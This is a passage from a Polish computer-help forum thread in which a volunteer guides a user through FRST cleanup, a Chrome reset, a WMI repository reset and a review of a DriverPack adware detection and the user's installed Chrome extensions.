cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Pozbądź się z listy dostawców wyszukiwarek w przeglądarce Google Chrome stron adware: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. 3. Zresetuj radykalnie Repozytorium WMI. Klawisz + R > services.msc > na liście odnajdź Instrumentacja zarządzania Windows i z prawokliku kliknij Wstrzymaj. Przejdź do folderu C:\WINDOWS\system32\wbem\Repository, a następnie opróżnij go. Uruchom ponownie system i sprawdź czy nadal występuję problem z nadmiernym wykorzystaniem procesora przez tą usługę. 4. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Zapytałem: Jak podsumowujesz obecną sytuację, czy omawiany problem ustąpił?Odpowiedziałaś:Zrobiłam co napisałeś, wydaje mi się, że laptop teraz mniej się męczy (choć może sobie wmawiam).Odpowiadam: chodziło mi bardziej o stronę infekcyjną (o problem tytułowy). Jeśli zaś chodzi o resztę: Wycinek z logu Addition: DriverPack Solution Updater (HKU\S-1-5-21-296273819-3779705695-2377126671-1000\...\DRPSu Updater) (Version: 0.0.25 - DriverPack Solution) wskazuje na to, że DriverPack jest zainstalowany i to właśnie z tym programem powiązana jest ta detekcja. Malwarebytes stosuje teraz agresywne metody wykrywania PUP i nawet w poprawnych aplikacjach (z jakimiś drobnymi modułami PUP) wykrywa zagrożenie. Samo odizolowanie w kwarantannie dałoby efekt taki sam jak usunięcie. Na system to nie wpłynie, na sam program - może. Google Chrome pracuje na silniku Blink, czyli korzysta z architektury wieloprocesowej (rozbicie kart / elementów do osobnych procesów). Awaria jednej karty (lub innych elementów) nie pociągnie za sobą całej przeglądarki. Nie przejmowałbym się tym, wg raportu FRST: CHR Extension: (Pop up blocker for Chrome™ - Poper Blocker) - C:\Users\Lea\AppData\Local\Google\Chrome\User Data\Default\Extensions\bkkbcggnhapdmkeljlodobbkopceiche [2018-01-01] CHR Extension: (Adblock Plus) - C:\Users\Lea\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2017-09-29] CHR Extension: (Avast SafePrice) - C:\Users\Lea\AppData\Local\Google\Chrome\User Data\Default\Extensions\eofcbnmajmjmplflapaojjnihcjkigck [2018-01-11] CHR Extension: (AdBlock) - C:\Users\Lea\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2017-12-07] CHR Extension: (Last.fm Scrobbler) - C:\Users\Lea\AppData\Local\Google\Chrome\User Data\Default\Extensions\hhinaapppaileiechjoiifaancjggfjm [2018-01-07] CHR Extension: (Floral Blue) - C:\Users\Lea\AppData\Local\Google\Chrome\User Data\Default\Extensions\mndpkoimnhcijdanbkehgccnadibcceg [2016-08-17] CHR Extension: (Płatności w sklepie Chrome Web Store) - C:\Users\Lea\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-22] CHR Extension: (Chrome Media Router) - C:\Users\Lea\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-12-17] masz zainstalowanych wiele rozszerzeń, które również mogą być odpowiedzialne za taką ilość procesów (możesz poeksperymentować z wyłączeniem ich kolejno i sprawdzeniem czy to przypadkiem nie któreś z nich). Są trafne, zresztą - "nie ma głupich pytań, są tylko głupie odpowiedzi".

Fix wykonany pomyślnie. Cieszę się, że mogłem pomóc! Na koniec zastosuj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne jak i system Windows.

Akcja wykonana pomyślnie. Zamykam.